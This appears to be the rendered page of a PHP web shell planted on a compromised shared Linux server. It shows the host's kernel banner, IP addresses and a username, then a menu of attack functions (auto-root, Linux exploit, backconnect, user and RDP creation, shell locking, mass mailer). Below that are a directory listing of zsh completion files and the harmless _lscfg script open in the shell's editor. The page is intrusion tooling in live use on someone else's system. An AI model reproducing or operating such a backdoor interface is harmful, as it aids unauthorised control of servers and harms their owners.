Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.13
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
zsh /
functions /
Completion /
AIX /
[ HOME SHELL ]
Name
Size
Permission
Action
_floppy
110
B
-rw-r--r--
_logical_volumes
455
B
-rw-r--r--
_lscfg
658
B
-rw-r--r--
_lsdev
1.39
KB
-rw-r--r--
_lslv
348
B
-rw-r--r--
_lspv
432
B
-rw-r--r--
_lsvg
505
B
-rw-r--r--
_object_classes
146
B
-rw-r--r--
_physical_volumes
124
B
-rw-r--r--
_smit
856
B
-rw-r--r--
_volume_groups
87
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : _lscfg
#compdef lscfg local state line expl curcontext="$curcontext" disp list devs sep _arguments -C -s \ '-l[display device information for named device]:device:->device' \ '-v[display vital product data for physical devices]' && return 0 if [[ "$state" = device ]]; then devs=( ${${${${(f)"$(lscfg)"}[6,-1]:# *}##??}/ ##[^ ]# #/:} ) if zstyle -T ":completion:${curcontext}:devices" verbose; then zstyle -s ":completion:${curcontext}:devices" list-separator sep || sep=-- zformat -a list " $sep " "$devs[@]" disp=(-ld list) else disp=() fi _wanted devices expl 'device' compadd "$disp[@]" - "${devs[@]%%:*}" return fi return 1
Close